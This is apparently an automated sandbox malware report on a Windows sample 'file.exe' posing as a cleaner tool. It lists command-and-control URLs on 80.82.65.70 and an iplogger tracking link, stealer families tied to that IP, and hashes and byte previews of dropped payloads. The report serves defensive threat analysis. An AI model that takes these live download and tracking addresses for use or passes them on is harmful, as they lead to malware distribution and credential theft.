                https://g-cleanit.hkfile.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                  		high
                  http://80.82.65.70/dll/key;file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://80.82.65.70/dll/downloadCfile.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://80.82.65.70/files/download0/files/downloadfile.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://upx.sf.netAmcache.hve.13.drfalse
                      		high
                      http://80.82.65.70/files/downloadAfile.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                        		high
                        https://iplogger.org/1Pz8p7file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                          		high
                          http://80.82.65.70/dll/keykfile.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://80.82.65.70/files/download0/files/downloadAfile.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://80.82.65.70/dll/keyutils.dllfile.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://80.82.65.70/add?substr=mixtwo&s=three&sub=empWfile.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://80.82.65.70/files/download21-573d1d5ce43ffile.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          80.82.65.70
                          		unknownNetherlands
                          		202425INT-NETWORKSCfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1574459
                          Start date and time:2024-12-13 10:47:16 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.evad.winEXE@2/15@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.190.147.1, 20.190.177.149, 20.190.147.6, 20.190.177.85, 20.190.147.11, 20.190.177.146, 20.190.177.23, 20.190.147.5, 104.208.16.94, 20.231.128.66, 20.223.35.26, 13.107.246.63, 20.109.210.53, 23.206.197.19, 150.171.27.10
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          04:48:45API Interceptor32777x Sleep call for process: file.exe modified
                          04:49:24API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          80.82.65.70file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                          • 80.82.65.70/soft/download
                          file.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/soft/download
                          6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name
                          GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70/name

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ax-0001.ax-msedge.netNi2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                          • 150.171.27.10
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 150.171.28.10
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 150.171.27.10
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 150.171.27.10
                          QyzM5yhuwd.exeGet hashmaliciousMedusaLockerBrowse
                          • 150.171.27.10
                          file.exeGet hashmaliciousUnknownBrowse
                          • 150.171.28.10
                          6C2Oryo96G.exeGet hashmaliciousUnknownBrowse
                          • 150.171.27.10
                          win.exeGet hashmaliciousLynxBrowse
                          • 150.171.28.10
                          RunScriptProtected.lnk.d.lnkGet hashmaliciousUnknownBrowse
                          • 150.171.27.10
                          dkarts.dll.dllGet hashmaliciousUnknownBrowse
                          • 150.171.27.10
                          fp2e7a.wpc.phicdn.netMN2MXYYRQG.exeGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                          • 192.229.221.95
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                          • 192.229.221.95
                          RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                          • 192.229.221.95
                          MKY8R16rwk.exeGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          137gv6WKud.dllGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          6C2Oryo96G.exeGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          tntexpedio.exeGet hashmaliciousUnknownBrowse
                          • 192.229.221.95

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          INT-NETWORKSCfile.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          6gnaXMdquM.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          rJB2nbYcHj.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          tWAHWXyUW3.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          GElFwKwcjS.exeGet hashmaliciousUnknownBrowse
                          • 80.82.65.70
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                          • 80.82.65.70

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]file.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousUnknownBrowse

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_fafd47531ab6d510499988ddace487f076f293_c8b7b6aa_e6d3f4e7-5989-4594-b486-86e330f75c89\Report.wer

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9713116193690797
                                              Encrypted:false
                                              SSDEEP:192:oUsr5+vwPiA0u1Od03judvszuiFJnZ24IO8ThBV:Qqwou1OijPzuiFJnY4IO8L
                                              MD5:52F12E1791B1FD04F13BD7BE6445827E
                                              SHA1:55F168B9AEB80F043B44823CAE51B15A526C9837
                                              SHA-256:E76ABE34C767D2A8B2BCC247C98BCCC3671887A95291CDE0BD453465E177DD40
                                              SHA-512:0C4964D9AA20A3A707455B3C139FC9CC735D3EDBB3C49EAEA2FA0D9644F6BF5C8EFE389222ECBC8CA73C87F6BB96789AB06AC5C09CCC69B3336224290E505FA0
                                              Malicious:true
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.5.6.9.5.8.1.8.7.2.3.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.5.6.9.5.9.3.2.7.8.7.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.d.3.f.4.e.7.-.5.9.8.9.-.4.5.9.4.-.b.4.8.6.-.8.6.e.3.3.0.f.7.5.c.8.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.4.9.6.2.3.2.-.3.5.c.f.-.4.2.3.3.-.8.e.f.7.-.4.e.d.3.6.8.7.d.7.f.8.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.8.-.0.0.0.1.-.0.0.1.5.-.9.f.9.5.-.c.9.2.0.4.4.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.1.4.9.7.9.f.a.6.0.7.e.3.8.d.2.7.9.0.5.b.1.f.1.5.1.f.1.c.2.5.8.0.0.0.0.1.5.0.6.!.0.0.0.0.6.5.3.b.1.c.1.5.9.8.a.6.2.7.8.2.b.5.8.e.5.2.d.d.3.f.2.c.5.3.3.5.5.a.a.d.9.4.f.a.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5657.tmp.dmp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 09:49:18 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):46132
                                              Entropy (8bit):2.545319373780476
                                              Encrypted:false
                                              SSDEEP:192:U5nAxnQIXpkYjunXgIFtOyoGtodeGVc8EEMfWsKd2GQVnaArwGMZig5UtVEvVhJB:q0nQSkYjxIOfGtoE8E3x7w7f0CrrH
                                              MD5:46FD8590E5BEA1AB50E9E0C8565ED5A6
                                              SHA1:3FD2291915B254DFCAED0E8B0FD6421E37112C55
                                              SHA-256:E86D621B240938CFD50E95C9D71DDE581EE8264D11BADB62FA38F7A585D7F711
                                              SHA-512:FF593E043AAA912ED4DAA3744404CA440F8D877B59A0237C066573E713640421B508CEB1257646CD5E8133EA22DF71C8F824EA21B1BDC21924D5B935C5FB55EF
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .........\g............4...........8...<.......T....,..........T.......8...........T............A...r..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......8.....\g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5762.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8298
                                              Entropy (8bit):3.6925765421311274
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJBCy6k86Y2D6SUsgmfBGW+pD089b6asfocem:R6lXJ56n6YnSUsgmfZi65fT
                                              MD5:5E90B0C7EED310282F545F31D54E4EE0
                                              SHA1:D514B48A9E5C8676F2F250F63B9DC9F81F901E6A
                                              SHA-256:9DFE5141A9967A6AF50701B87202F2A5FEBF96041E5B6FBD17CA06F4F331D078
                                              SHA-512:EBBB87361D182661A3E05E80132CBB51BA95EE06F921DD33246B2A6D253BA51E339CCC6CB1C6DB5F7FD9D82847DF5324D980928421D08AF4E12AF0FC683918A6
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.8.0.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5792.tmp.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4541
                                              Entropy (8bit):4.432776405848175
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zs6Jg77aI93xjCWpW8VYvYm8M4JBRF7+q82I7kuW1+hd:uIjfII7pxjD7VLJl0HW1+hd
                                              MD5:621164D675259CD49107A1F3DA1E2143
                                              SHA1:2BD0A3954DE5AD16866257A9C98BE1750A6A4EB7
                                              SHA-256:34ED705BD6AD7A360E4EE6E60A3DFECE16DF9D9F688922F12DFCA8DAEDB9E57F
                                              SHA-512:DB57D8A7AA307995EB13DB0F8BC59347B052A3B436E3958BB430BE274073779CD76B4E8858390F87A8E2024BE162473147A7D80C5C3D9DC437EDF56DE3B2E600
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629331" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\fuckingdllENCR[1].dll

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):97296
                                              Entropy (8bit):7.9982317718947025
                                              Encrypted:true
                                              SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                              MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                              SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                              SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                              SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:0

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):242176
                                              Entropy (8bit):6.47050397947197
                                              Encrypted:false
                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\download[1].htm

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:V:V
                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                              Malicious:false
                                              Preview:0

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\key[1].htm

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):21
                                              Entropy (8bit):3.880179922675737
                                              Encrypted:false
                                              SSDEEP:3:gFsR0GOWW:gyRhI
                                              MD5:408E94319D97609B8E768415873D5A14
                                              SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                              SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                              SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                              Malicious:false
                                              Preview:9tKiK3bsYm4fMuK47Pk3s

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):1502720
                                              Entropy (8bit):7.646111739368707
                                              Encrypted:false
                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
